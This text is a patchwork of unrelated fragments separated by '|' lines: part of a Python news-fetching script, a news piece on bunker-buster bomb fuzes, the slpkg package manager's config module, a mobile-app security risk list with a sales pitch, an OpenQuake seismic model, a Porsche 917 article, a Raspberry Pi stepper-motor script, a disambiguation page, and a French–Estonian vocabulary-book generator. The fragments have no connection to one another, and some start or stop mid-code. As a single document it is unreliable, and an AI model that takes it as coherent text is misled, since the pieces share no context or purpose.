item['text'] = getFullText(itemdetail['permaLink'])
if len(item['text'])<100: #exceptional case
item['text'] = item['teaserText']
if 'type' in item:
if item['type']=='AudioTeaser':
writer_audio.write_item(item)
else:
if item['type']=='VideoTeaser':
writer_video.write_item(item)
else:
print 'item ', item['reference']['id'], 'exists in db already!'
except Exception as e:
print host
print e
if __name__ == '__main__':
print '!-----------------------------------------------------'
print '!@usage: python [me] language duplicatecheck\n!\t--language: en,es,fr,de\n!\t--duplicatecheck:1 (check),0 (no check)'
print '!-----------------------------------------------------'
language = sys.argv[1]
duplicatecheck = sys.argv[2]
print 'Now fetching data for ', language, ' with the duplicate check option: ', duplicatecheck
fetch_data(language, duplicatecheck)
|
If the US manages to build a bunker-buster powerful enough to knock out Iran's buried nuclear facilities, it can thank some ordnance geeks in Bavaria for helping get the job done.
Here's the story. The American-built FMU-159/B Hard Target Smart Fuze should have been a key part of US bunker-busting arsenal. But it didn't work. Or rather, it "experienced Engineering and Manufacturing Development qualification problems resulting in termination of the program."
...and you want to get the right one. Secondly, you don't want your bomb to overpenetrate, disappearing into the floor and burrowing fifty feet into the ground beneath the bunker before exploding with a faint thump.
The HTSF was supposed to have several modes, capable of counting the number of 'voids' or levels it passed through as well as working on time delay. It was to equip the heavyweight GBU-28 bomb as well as the AGM-86D cruise missile and a host of other weapons. Unfortunately, the aforementioned problems meant that it was not available, so the Pentagon had to fall back on simple FMU-143time-delay fuzes.
Based on the success of the FCT effort, DTRA initiated a Product Improvement Program to package PIMPF for use with the Conventional Air-launched Cruise Missile (CALCM) in order to achieve requirements for standoff defeat of hard and deeply buried targets and to address deficiencies with the current CALCM fuze. This PIMPF PIP (now retitiled as the Void Sensing Fuze Product Improvement Program) will integrate, qualify, test, and deliver the repackaged PIMPF for retrofit into the CALCM weapon system and set the stage for follow-on efforts to address smart fuze requirements for direct attack weapons."
It turns out that the TDW, makers of PIMPF, have been offering it to the US since 2002, as in this presentation entitled "The German Hard Target Fuze is ready." After five years of development, the US version was clearly not ready, and Uncle Sam was forced to buy the foreign product.
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# config.py file is part of slpkg.
# Copyright 2014-2015 Dimitris Zlatanidis <d.zlatanidis@gmail.com>
# All rights reserved.
# Slpkg is a user-friendly package manager for Slackware installations
# https://github.com/dslackw/slpkg
# Slpkg is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import shutil
import filecmp
import subprocess
from slpkg.utils import Utils
from slpkg.__metadata__ import MetaData as _meta_
class Config(object):
"""Print or edit slpkg configuration file
"""
def __init__(self):
self.config_file = "/etc/slpkg/slpkg.conf"
self.meta = _meta_
def view(self):
"""View slpkg config file
"""
print("") # new line at start
conf_args = [
"RELEASE",
"BUILD_PATH",
"PACKAGES",
"PATCHES",
"CHECKMD5",
"DEL_ALL",
"DEL_BUILD",
"SBO_BUILD_LOG",
"MAKEFLAGS",
"DEFAULT_ANSWER",
"REMOVE_DEPS_ANSWER",
"SKIP_UNST",
"RSL_DEPS",
"DEL_DEPS",
"USE_COLORS",
"DOWNDER",
"DOWNDER_OPTIONS",
"SLACKPKG_LOG",
"ONLY_INSTALLED",
"PRG_BAR",
"EDITOR"
]
read_conf = Utils().read_file(self.config_file)
for line in read_conf.splitlines():
if not line.startswith("#") and line.split("=")[0] in conf_args:
print("{0}".format(line))
else:
print("{0}{1}{2}".format(self.meta.color["CYAN"], line,
self.meta.color["ENDC"]))
print("") # new line at end
def edit(self):
"""Edit configuration file
"""
subprocess.call("{0} {1}".format(self.meta.editor,
self.config_file), shell=True)
def reset(self):
"""Reset slpkg.conf file with default values
"""
shutil.copy2(self.config_file + ".orig", self.config_file)
if filecmp.cmp(self.config_file + ".orig", self.config_file):
print("{0}The reset was done{1}".format(
self.meta.color["GREEN"], self.meta.color["ENDC"]))
else:
print("{0}Reset failed{1}".format(self.meta.color["RED"],
self.meta.color["ENDC"]))
|
The increased usage of mobile applications running on smart phones or tablets raises new threats that can exploit vulnerabilities of these new technologies.
Weak Server Side Controls - Bad mobile application server code is caused by the rush to market, lack of security knowledge, frameworks that don’t prioritize security, lower security budgets for mobile applications, cross-platform development and compilation.
Insecure Data Storage- Devices file systems are often easily accessible through rooting or jailbreaking a device. Where data is not protected properly, all that is needed to view application data is to hook the phone up to a computer and use some specialized tools.
Insufficient Transport Layer Protection - If the application is coded poorly, threat agents can use techniques to view this sensitive data while it's traveling across the network.
Unintended Data Leakage - Unintended data leakage is a branch of insecure data storage. It includes all manner of vulnerabilities that can be introduced by the OS, frameworks, compiler environment, new hardware, etc, all without a developers knowledge.
Poor Authorization and Authentication - Less authentication factors, local authentication leading to client-side bypass vulnerabilities, usage of persistent authentication (remember me) functionality.
Broken Cryptography - The creation and use of custom encryption algorithms, use of insecure and/or deprecated algorithms, poor key management.
Client Side Injection - Supplied data is not being subject to proper input validation, disallowing code injection is not effectively implemented.
Security Decisions Via Untrusted Inputs - The mobile application does npt restrict access based on a white-list of trusted applications when Inter Process Communications (IPC) are involved, and sensitive actions which are triggered through IPC entry points does not require user interaction before performing the action.
Improper Session Handling - Failure to invalidate sessions on the backend, lack of adequate timeout protection, failure to Properly Rotate Cookies, Insecure Token Creation.
Lack of Binary Protections - Hosting code in an untrustworthy environment, an environment in which the organization does not have physical control. This includes mobile clients, firmware in appliances, cloud spaces, or data centers within particular countries.
Infologica offers security audit and penetration testing services to help our customers to evaluate their exposure related to the usage of mobile applications.
Subscribe to our Newsletter Find out about our events, be informed about best management practices, security and consulting trends or about the new regulatory requirements mandatory for information systems.
|
# -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2013-2017 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
"""
Module exports :class:`BooreEtAl1993GSCBest`,
:class:`BooreEtAl1993GSCUpperLimit`, :class:`BooreEtAl1993GSCLowerLimit`.
"""
from __future__ import division
import numpy as np
from scipy.constants import g
from openquake.hazardlib.gsim.base import GMPE, CoeffsTable
from openquake.hazardlib import const
from openquake.hazardlib.imt import PGA, SA
class BooreEtAl1993GSCBest(GMPE):
"""
Implement equation used by the Geological Survey of Canada (GSC) for
the 2010 Western Canada National Seismic Hazard Model. The class implements
the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
("Estimation of Response Spectra and Peak Accelerations from Western North
American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
Open File Report 93-509).
Equation coefficients provided by GSC for the random horizontal component
and corresponding to the 'Best' case (that is mean unaffected)
"""
#: Supported tectonic region type is active shallow crust, given
#: that the equations have been derived for Western North America
DEFINED_FOR_TECTONIC_REGION_TYPE = const.TRT.ACTIVE_SHALLOW_CRUST
#: Supported intensity measure types are spectral acceleration,
#: and peak ground acceleration
DEFINED_FOR_INTENSITY_MEASURE_TYPES = set([
PGA,
SA
])
#: Supported intensity measure component is random horizontal
#: :attr:`~openquake.hazardlib.const.IMC.RANDOM_HORIZONTAL`,
DEFINED_FOR_INTENSITY_MEASURE_COMPONENT = const.IMC.RANDOM_HORIZONTAL
#: Supported standard deviation type is total
DEFINED_FOR_STANDARD_DEVIATION_TYPES = set([
const.StdDev.TOTAL
])
#: site params are not required
REQUIRES_SITES_PARAMETERS = set()
#: Required rupture parameter is magnitude
REQUIRES_RUPTURE_PARAMETERS = set(('mag', ))
#: Required distance measure is Rjb distance
#: see paragraph 'Predictor Variables', page 6.
REQUIRES_DISTANCES = set(('rjb', ))
def get_mean_and_stddevs(self, sites, rup, dists, imt, stddev_types):
"""
See :meth:`superclass method
<.base.GroundShakingIntensityModel.get_mean_and_stddevs>`
for spec of input and result values.
"""
C = self.COEFFS[imt]
mag = rup.mag - 6
d = np.sqrt(dists.rjb ** 2 + C['c7'] ** 2)
mean = np.zeros_like(d)
mean += C['c1'] + C['c2'] * mag + C['c3'] * mag ** 2 + C['c6']
idx = d <= 100.
mean[idx] = mean[idx] + C['c5'] * np.log10(d[idx])
idx = d > 100.
mean[idx] = (mean[idx] + C['c5'] * np.log10(100.) -
np.log10(d[idx] / 100.) + C['c4'] * (d[idx] - 100.))
# convert from log10 to ln and from cm/s**2 to g
mean = np.log((10.0 ** (mean - 2.0)) / g)
stddevs = self._get_stddevs(C, stddev_types, dists.rjb.shape[0])
return mean, stddevs
def _get_stddevs(self, C, stddev_types, num_sites):
"""
Return total standard deviation.
"""
assert all(stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES
for stddev_type in stddev_types)
stddevs = [np.zeros(num_sites) + C['sigma'] for _ in stddev_types]
return stddevs
#: coefficient table provided by GSC
COEFFS = CoeffsTable(sa_damping=5, table="""\
IMT c1 c2 c3 c4 c5 c6 c7 sigma
pga 2.887 0.229 0.0 -0.00326 -0.778 0.162 5.57 0.529
0.1 3.451 0.327 -0.098 -0.00395 -0.934 0.046 6.27 0.479
0.2 3.464 0.309 -0.090 -0.00259 -0.924 0.190 7.02 0.495
0.3 3.295 0.334 -0.070 -0.00202 -0.893 0.239 5.94 0.520
0.5 2.980 0.384 -0.039 -0.00148 -0.846 0.279 4.13 0.562
1.0 2.522 0.450 -0.014 -0.00097 -0.798 0.314 2.90 0.622
2.0 2.234 0.471 -0.037 -0.00064 -0.812 0.360 5.85 0.675
""")
class BooreEtAl1993GSCUpperLimit(BooreEtAl1993GSCBest):
"""
Implement equation used by the Geological Survey of Canada (GSC) for
the 2010 Western Canada National Seismic Hazard Model. The class implements
the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
("Estimation of Response Spectra and Peak Accelerations from Western North
American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
Open File Report 93-509).
Equation coefficients provided by GSC for the random horizontal component
and corresponding to the 'Upper Limit' case (that is mean value + 0.7 nat
log)
"""
#: coefficient table provided by GSC
COEFFS = CoeffsTable(sa_damping=5, table="""\
IMT c1 c2 c3 c4 c5 c6 c7 sigma
pga 3.187 0.229 0.0 -0.00326 -0.778 0.162 5.57 0.529
0.1 3.751 0.327 -0.098 -0.00395 -0.934 0.046 6.27 0.479
0.2 3.764 0.309 -0.090 -0.00259 -0.924 0.190 7.02 0.495
0.3 3.595 0.334 -0.070 -0.00202 -0.893 0.239 5.94 0.520
0.5 3.280 0.384 -0.039 -0.00148 -0.846 0.279 4.13 0.562
1.0 2.822 0.450 -0.014 -0.00097 -0.798 0.314 2.90 0.622
2.0 2.534 0.471 -0.037 -0.00064 -0.812 0.360 5.85 0.675
""")
class BooreEtAl1993GSCLowerLimit(BooreEtAl1993GSCBest):
"""
Implement equation used by the Geological Survey of Canada (GSC) for
the 2010 Western Canada National Seismic Hazard Model. The class implements
the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
("Estimation of Response Spectra and Peak Accelerations from Western North
American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
Open File Report 93-509).
Equation coefficients provided by GSC for the random horizontal component
and corresponding to the 'Lower Limit' case (that is mean value - 0.7 nat
log)
"""
#: coefficient table provided by GSC
COEFFS = CoeffsTable(sa_damping=5, table="""\
IMT c1 c2 c3 c4 c5 c6 c7 sigma
pga 2.587 0.229 0.0 -0.00326 -0.778 0.162 5.57 0.529
0.1 3.151 0.327 -0.098 -0.00395 -0.934 0.046 6.27 0.479
0.2 3.164 0.309 -0.090 -0.00259 -0.924 0.190 7.02 0.495
0.3 2.995 0.334 -0.070 -0.00202 -0.893 0.239 5.94 0.520
0.5 2.680 0.384 -0.039 -0.00148 -0.846 0.279 4.13 0.562
1.0 2.222 0.450 -0.014 -0.00097 -0.798 0.314 2.90 0.622
2.0 1.934 0.471 -0.037 -0.00064 -0.812 0.360 5.85 0.675
""")
|
Image Gallery: Exotic Cars The Porsche 917 got off to a rocky start in the late 1960s, but after a little tweaking, the German automaker had a more than just a winner on their hands -- they had a true legend. See more pictures of exotic cars.
If someone were to make a list of the greatest racecars ever made, the Porsche 917 would almost certainly have to be on it. In fact, the 917 makes a pretty good case for itself to be the greatest racecar of all time.
Want some proof? How about how with some iterations of the car rated between 1,110 and 1,500 horsepower, it remains one of the most powerful racecars ever made -- not bad for a car that competed in the early 1970s.
Then there's how the car dominated at the track, securing multiple victories at the 24 Hours of Le Mans, Daytona, Watkins Glen and a host of other events and tracks. The car was also immortalized in the Steve McQueen film "Le Mans," which included footage of its victory in that race in 1970 [source: Lieberman].
There are many more reasons why the 917 is considered among the all-time greats. If you don't immediately recognize those three numbers, don't worry -- you've probably seen the car in photographs somewhere.
With the car's low, wide shape that included a tapering tail at the back, swooping front fenders and massive tires, it looked especially striking in its iconic blue-and-orange Gulf Oil livery. Yes, it's that car.
According to Porsche, when 50 international motor sports experts from the British magazine Motor Sport were asked to name the greatest racing car in history, they cited the Porsche 917 [source: Porsche].
But while its reputation is considerable today, the 917 got off to a rocky start in the late 1960s when Porsche struggled to build enough examples of the car to qualify for competition. Then they had trouble finding drivers brave enough to drive the beast, whose power far outpaced its handling. It was also initially plagued with development problems. But Porsche persevered with the 917, and after some tweaks, the German automaker had a more than just a winner on their hands -- they had the makings of a legend.
In this article we'll learn all about what made the iconic 917 tick, and take a look at its lasting impact on racing and popular culture.
|
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
enable_pin = 27 #18
coil_A_2_pin = 18 #23 #17
coil_A_1_pin = 23 #18 #4
coil_B_1_pin = 25 #23
coil_B_2_pin = 24 #24
GPIO.setup(enable_pin, GPIO.OUT)
GPIO.setup(coil_A_1_pin, GPIO.OUT)
GPIO.setup(coil_A_2_pin, GPIO.OUT)
GPIO.setup(coil_B_1_pin, GPIO.OUT)
GPIO.setup(coil_B_2_pin, GPIO.OUT)
GPIO.output(enable_pin, 1)
def forward(delay, steps):
for i in range(0, steps):
# setStep(1,0,1,0)
# time.sleep(delay)
# setStep(1, 0, 1, 1)
# time.sleep(delay)
# setStep(1, 0, 0, 1)
# time.sleep(delay)
# setStep(1, 1, 0, 1)
# time.sleep(delay)
# setStep(0, 1, 0, 1)
# time.sleep(delay)
# setStep(0, 1, 1, 1)
# time.sleep(delay)
# setStep(0, 1, 1, 0)
# time.sleep(delay)
# setStep(1, 1, 1, 0)
# time.sleep(delay)
setStep(1, 0, 1, 0)
time.sleep(delay)
setStep(0, 1, 1, 0)
time.sleep(delay)
setStep(0, 1, 0, 1)
time.sleep(delay)
setStep(1, 0, 0, 1)
time.sleep(delay)
def backwards(delay, steps):
for i in range(0, steps):
setStep(1, 0, 0, 1)
time.sleep(delay)
setStep(0, 1, 0, 1)
time.sleep(delay)
setStep(0, 1, 1, 0)
time.sleep(delay)
setStep(1, 0, 1, 0)
time.sleep(delay)
def setStep(w1, w2, w3, w4):
GPIO.output(coil_A_1_pin, w1)
GPIO.output(coil_A_2_pin, w2)
GPIO.output(coil_B_1_pin, w3)
GPIO.output(coil_B_2_pin, w4)
while True:
#setStep(1,1,1,1)
delay = raw_input("Delay between steps (milliseconds)?")
steps = raw_input("How many steps forward? ")
forward(int(delay) / 1000.0, int(steps))
steps = raw_input("How many steps backwards? ")
backwards(int(delay) / 1000.0, int(steps))
|
Fat is an oily or greasy organic substance.
"Fat", a short story by Raymond Carver from the collection Will You Please Be Quiet, Please?
Ralph Waldsmith (1892-1925), an American football player in the early days of the National Football League, nicknamed "Fat"
Fath, Iran, a village also known as "Fāt"
Gordo (disambiguation), the Spanish and Portuguese word for "fat"
This disambiguation page lists articles associated with the title Fat.
This page was last edited on 29 March 2019, at 01:46 (UTC).
|
# -*- coding: UTF-8 -*-
## Copyright 2011-2013 Luc Saffre
## This file is part of the Lino project.
## Lino is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
## Lino is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with Lino; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import os
import sys
from lino.modlib.vocbook.fr import French, Autre, Nom, NomPropre, Adjectif, Numerique, Verbe, NomGeographique
from lino.modlib.vocbook.et import Estonian
from lino.modlib.vocbook.base import Book, FR, M, F, ET, PRON, GEON, GEOM, GEOF
if __name__ == '__main__':
if len(sys.argv) != 3:
raise Exception("""
Usage : %(cmd)s rst OUTPUT_ROOT_DIR
%(cmd)s odt OUTPUT_FILE
""" % dict(cmd=sys.argv[0]))
output_format = sys.argv[1]
else:
output_format = 'rst' #
if output_format == "rst":
FULL_CONTENT = True
else:
FULL_CONTENT = False
HAS_FUN = True
HAS_EXERCICES = False
book = Book(French,Estonian,
title="Kutsealane prantsuse keel kokkadele",
input_template=os.path.join(os.path.dirname(__file__),'Default.odt'))
#~ os.path.join(os.path.dirname(__file__),'cfr.odt')
Pronounciation = book.add_section(u"Hääldamine",intro=u"""
Esimeses osas keskendume hääldamisele.
Siin pole vaja meelde jätta näidissõnu,
vaid et sa oskaksid neid ette lugeda õigesti hääldades.
""")
Intro = Pronounciation.add_section("Sissejuhatus",intro="""
""")
Eestlastele = Pronounciation.add_section("Eestlastele",intro="""
""")
Pronounciation.add_lesson(u"Hääldamisreeglite spikker", intro=u"""
Hääldamisreeglid:
[ruleslist
ai
ail
ain
an
au
c
cedille
ch
eau
eil
ein
en
ent
er
et
eu
euil
g
gn
gu
h
ien
il
ill
in
j
oi
oe
oin
on
ou
u
ueil
ui
un
y]
""")
Reeglid = Pronounciation.add_section(u"Reeglid",ref="reeglid")
if output_format == "rst":
Reeglid.intro = u"""
Ülevaade:
- [ref u], [ref ou], [ref ui], [ref eu], [ref au], [ref eau], [ref oi], [ref ai], [ref y], [ref oe]
- [ref on], [ref an], [ref en], [ref un], [ref in], [ref ain], [ref ein], [ref ien], [ref oin]
- [ref c], [ref h], [ref ch], [ref cedille]
- [ref er], [ref et], [ref ent]
- [ref j], [ref g], [ref gu], [ref gn]
- [ref il], [ref ill], [ref ail], [ref eil], [ref euil], [ref ueil]
"""
#~ if FULL_CONTENT:
#~ Eesti = Pronounciation.add_section(u"Veel")
#~ Vocabulary = book.add_section(u"Sõnavara",intro=u"""
#~ Teises osa hakkame õpima sõnavara,
#~ oletades et hääldamine on enam vähem selge.
#~ """)
Vocabulary = book
#~ General = Vocabulary.add_section(u"Üldiselt")
General = Vocabulary.add_section(u"Üldine sõnavara")
Kokadele = Vocabulary.add_section(u"Kulinaaria")
if HAS_FUN:
Fun = Vocabulary.add_section(u"Laulud")
if HAS_EXERCICES:
Exercices = Vocabulary.add_section(u"Harjutused")
Intro.add_lesson(u"Tuntud sõnad", intro=u"""
Mõned sõnad, mida sa juba tead.
Tutvumine hääldamiskirjaga.
""")
Intro.parse_words(None,u"""
la soupe [sup] : supp
la carte [kart] : kaart
à la carte [ala'kart] : menüü järgi
le vase [vaaz] : vaas
la douche [duš] : dušš
le disque [disk] : ketas
merci [mär'si] : aitäh
le garage [ga'raaž] : garaaž
le journal [žur'nal] : päevik | ajaleht
""")
Intro.add_after(u"""
Kuna hääldamine on algaja peamine raskus,
tuleb meil seda kuidagi kirja panna.
Seda teeme sõnade taha nurksulgudes (**[]**).
- **ou** hääldatakse **[u]**.
- **e** sõna lõpus kaob ära
""")
Intro.add_lesson(u"Hääldamiskirjeldus", intro=u"""
Hääldamiskirjeldustes kasutame
kohandatud `X-SAMPA
<http://fr.wiktionary.org/wiki/Annexe:Prononciation/fran%C3%A7ais>`_ variant,
mis on eestlastele intuitiivsem õppida
kui näiteks `IPA
<http://en.wiktionary.org/wiki/Wiktionary:IPA>`_ (International
Phonetic Alphabet).
- Üldiselt loed lihtsalt seda, mis on nurksulgudes.
- Pikad kaashäälikud on topelt.
- Apostroof (') näitab, milline silp on **rõhutatud**.
Prantsuse keeles on rõhk tavaliselt viimasel silbil.
Mõned helid tuleb õppida:
==== ================== ====================== =======================================
täht selgitus näided e.k. näided pr.k.
==== ================== ====================== =======================================
[ə] tumm e Lott\ **e** **je** [žə], **ne** [nə]
[o] kinnine o L\ **oo**\ ne **mot** [mo], **beau** [boo]
[O] avatud o L\ **o**\ tte **bonne** [bOn], **mort** [mOOr]
[ö] kinnine ö l\ **öö**\ ve **feu** [föö], **peu** [pöö]
[Ö] avatud ö ingl.k. "g\ **ir**\ l" **beurre** [bÖÖr], **jeune** [žÖÖn]
[w] pehme w ingl.k. "\ **w**\ ow" **toilettes** [twa'lät], **boudoir** [bud'waar]
[O~] nasaalne [o] - **bonjour** [bO~'žuur], **mon** [mO~]
[A~] nasaalne [O] - **tante** ['tA~tə], **prendre** ['prA~drə]
[Ö~] nasaalne [Ö] - **un** [Ö~], **parfum** [par'fÖ~]
[Ä~] nasaalne [ä] - **chien** [šiÄ~], **rien** [riÄ~]
==== ================== ====================== =======================================
""")
Eestlastele.add_lesson("Mesilashäälikud", intro="""
"Mesilashäälikud" on **s**, **š**, **z** ja **ž**.
Nad on eesti keeles ka olemas, aga prantsuse keeles on
nende erinevus palju olulisem.
=========== ===========================
terav pehme
=========== ===========================
**s**\ upp **z**\ oom
**š**\ okk **ž**\ est
=========== ===========================
""",ref="s")
Eestlastele.parse_words(None,u"""
la soupe [sup] : supp
le garage [ga'raaž] : garaaž
le geste [žäst] : žest | liigutus
le choc [žOk] : šokk | löök
""")
if FULL_CONTENT:
Eestlastele.parse_words(None,u"""
le genre [žA~rə] : žanre
""")
Intro.add_lesson(u"Artikkel", intro=u"""
Nagu inglise keeles pannakse ka prantsuse keeles nimisõnade ette *artikkel*.
Prantsuse keeles on kõikidel asjadel lisaks oma **sugu**.
Näiteks laud (*la table*) on naissoost,
raamat (*le livre*) on meessoost.
Kui sul on mitu lauda või mitu raamatu,
siis on neil sama artikkel **les**: *les tables* ja *les livres*.
Kui sõna algab täishäälikuga, siis kaob
artiklitest *le* ja *la* viimane
täht ära ja nad muutuvad mõlemad **l'**-ks.
Artiklid *le*, *la* ja *les* nimetatakse **määravaks** artikliteks.
Määrava artikli asemel võib ka olla **umbmäärane** artikkel:
**un** (meessoost), **une** (naissoost) või **des** (mitmus).
Erinevus on nagu inglise keeles, kus on olemas määrav
artikkel **the** ja umbmäärane artikel **a**.
Olenevalt kontekstist kasutatakse kas see või teine.
Näiteks
"I am **a** man from Vigala"
ja
"I am **the** man you need".
Kokkuvõteks:
========== ============= =============
sugu määrav umbmäärane
========== ============= =============
meessoost **le** [lə] **un** [Ö~]
naissoost **la** [la] **une** [ün]
mitmus **les** [lä] **des** [dä]
========== ============= =============
""")
#~ Intro.parse_words(Autre,u"""
#~ le [lə] : (määrav meessoost artikkel)
#~ la [la] : (määrav naissoost artikkel)
#~ les [lä] : (määrav artikkel mitmus)
#~ """)
#~ Intro.parse_words(Autre,u"""
#~ un [Ö~] : (umbmäärane meessoost artikkel)
#~ une [ün] : (umbmäärane naissoost artikkel)
#~ des [dä] : (umbmäärane artikkel mitmus)
#~ """)
Intro.add_lesson(u"Rõhutud, aga lühike", intro=u"""
Rõhutatud täishäälikud ei ole sellepärast tingimata pikad.
Prantsuse keeles tuleb tihti ette, et sõna lõpeb *lühikese* täishäälikuga.
""")
Intro.parse_words(Nom,u"""
le menu [mə'nü] : menüü
le chocolat [šoko'la] : šokolaad
le plat [pla] : roog | kauss
le cinéma [sine'ma] : kino
le paradis [para'di] : paradiis
""")
Intro.add_lesson(u"O on kinnine või avatud", u"""
Helid **[o]** ja **[ö]** on eesti keeles alati *kinnised*.
Prantsuse keeles on lisaks ka *avatud* vormid.
Hääldamiskirjelduses on kinnine vorm **väikese** tähega ja
avatud vorm **suure** tähega.
""")
Intro.parse_words(Autre,u"""
je donne [dOn] : ma annan
je dors [dOOr] : ma magan
""")
Intro.parse_words(Nom,u"""
le dos [do] : selg
le mot [mo] : sõna
le tome [toom] : köide
""")
if FULL_CONTENT:
Intro.parse_words(Nom,u"""
la mort [mOOr] : surm
le or [OOr] : kuld
le boulot [bu'lo] : töö (kõnekeel)
le bouleau [bu'loo] : kask
le bureau [bü'roo] : büroo
""")
if not FULL_CONTENT:
Eestlastele.add_lesson(u"Cold gold, big pigs and downtowns", u"""
Erinevus tugeva ja nõrda K, P või T vahel on prantsuse keeles sama
oluline nagu inglise ja saksa keeles.
""",ref="kpt")
Eestlastele.parse_words(Autre,u"""
la gare [gaar] : raudteejaam
le car [kaar] : reisibuss
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
le doigt [dwa] : sõrm
le toit [twa] : katus
""")
else:
Eestlastele.add_lesson(u"b ja p", u"""
b ja p on prantsuse keeles selgelt erinevad.
""")
Eestlastele.parse_words(None,u"""
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
le bon [bO~] : tšekk | talong
le pont [pO~] : sild
le bon ton [bO~'tO~] : viisakus
le ponton [pO~'tO~] : pontoon (nt. pontoonsild)
la peau [poo] : nahk
beau (m.) : ilus
le bois [bwa] : puu (materjal) | mets
le poids [pwa] : kaal
""")
Eestlastele.add_lesson(u"d ja t", u"""
d ja t on prantsuse keeles selgelt erinevad.
""")
Eestlastele.parse_words(None,u"""
le don [dO~] : annetus
le ton [tO~] : toon
le centre ['sA~trə] : keskus
la cendre ['sA~drə] : tuhk
je donne [dOn] : ma annan
la tonne [tOn] : tonn
le toit [twa] : katus
le doigt [dwa] : sõrm
""")
Eestlastele.add_lesson(u"g ja k", u"""
g ja k on prantsuse keeles selgelt erinevad.
""")
Eestlastele.parse_words(None,u"""
le gond [gO~] : uksehing
le con [kO~] : loll
la gare [gaar] : raudteejaam
le car [kaar] : reisibuss
car [kaar] : sest
le garçon [gar'sO~] : poiss
Qui est Guy? [ki ä gi] : Kes on Guy?
""")
Reeglid.add_lesson(u"u", intro=u"""
**u** (siis kui see pole teise täishäälikuga koos)
hääldatakse **[ü]** või **[üü]**.
""",ref="u")
Reeglid.parse_words(Nom,u"""
le bureau [bü'roo] : büroo
le bus [büs] : buss
# le mur [müür] : sein | müür
la puce [püs] : kirp
le jus [žü] : mahl
# le but [büt] : eesmärk
# la pute [püt] : hoor
le sucre ['sükrə] : suhkur
""")
Reeglid.add_lesson(u"ou", intro=u"""
**ou** hääldatakse **[u]** või **[uu]**.
""",ref="ou")
Reeglid.parse_words(None,u"""
le journal [žur'nal] : päevik | ajaleht
le cours [kuur] : kursus | tund (koolis)
le cou [ku] : kael
le goût [gu] : maitse
""")
Reeglid.add_lesson(u"ui",
u"""
**ui** hääldatakse **[wi]** või **[wii]** (mida
kirjutatakse vahest ka **[üi]** või **[üii]**).
""",ref="ui")
Reeglid.parse_words(None,u"""
la suite [swit] : järg | tagajärg | rida, kord | saatjaskond
bonne nuit [bOnə 'nwi] : head ööd
la cuisine [kwi'zin] : köök
je cuis [žə kwi] : ma keedan
je suis [žə swi] : ma olen | ma järgnen
""")
Reeglid.add_lesson(u"eu", u"""
**eu** hääldatakse **[öö]** või **[ÖÖ]**.
""",ref="eu")
Reeglid.parse_words(None,u"""
le feu [föö] : tuli
# le neveu [nə'vöö] : onupoeg | tädipoeg
je veux [žə vöö] : ma tahan
""")
Reeglid.parse_words(Autre,u"""
# neutre (mf) ['nöötrə] : neutraalne
""")
Reeglid.parse_words(Numerique,u"""
neuf [nÖf] : üheksa
""")
Reeglid.parse_words(Nom,u"""
le professeur [profesÖÖr] : professor
le beurre [bÖÖr] : või
la peur [pÖÖr] : hirm
""")
#~ Reeglid.parse_words(None,u"""
#~ l'huile (f) [wil] : õli
#~ cuire [kwiir] : keetma
#~ suivre ['swiivrə] : järgima
#~ la cuillère [kwi'jäär] : lusikas
#~ """)
Reeglid.add_lesson(u"au",
intro=u"""
**au** hääldatakse **[o]** või **[oo]**.
""",ref="au")
Reeglid.parse_words(None,u"""
une auberge [o'bäržə] : võõrastemaja
un auteur [o'tÖÖr] : autor
""")
Reeglid.add_lesson(u"eau",
intro=u"""
**eau** hääldatakse **[oo]**.
Nagu [ref au], aga **e** ühineb nendega ja kaob ära.
""",ref="eau")
Reeglid.parse_words(None,u"""
le château [ša'too] : loss
le bateau [ba'too] : laev
la eau [oo] : vesi
""")
Reeglid.add_lesson(u"oi",
u"""
**oi** hääldatakse **[wa]**.
Vaata ka [ref oin].
""",ref="oi")
Reeglid.parse_words(Autre,u"""
voilà [vwa'la] : näe siin
trois [trwa] : kolm
bonsoir [bO~'swaar] : head õhtut
au revoir [orə'vwaar] : nägemiseni
""")
Reeglid.parse_words(Nom,u"""
le roi [rwa] : kuningas
la loi [lwa] : seadus
la toilette [twa'lät] : tualett
""")
Reeglid.add_lesson(u"ai",
u"""
**ai** hääldatakse **[ä]** või **[ää]**
(mõnikord ka **[ə]**).
""",ref="ai")
Reeglid.parse_words(Nom,u"""
la maison [mä'zO~] : maja
le domaine [do'mään] : domeen
la fraise [frääz] : maasikas
# la paire [päär] : paar
""")
Reeglid.parse_words(Adjectif,u"""
frais [frä] | fraiche [fräš] : värske
""")
Reeglid.parse_words(None,u"""
nous faisons [nu fə'zO~] : meie teeme
le faisan [fə'zA~] : faasan
""")
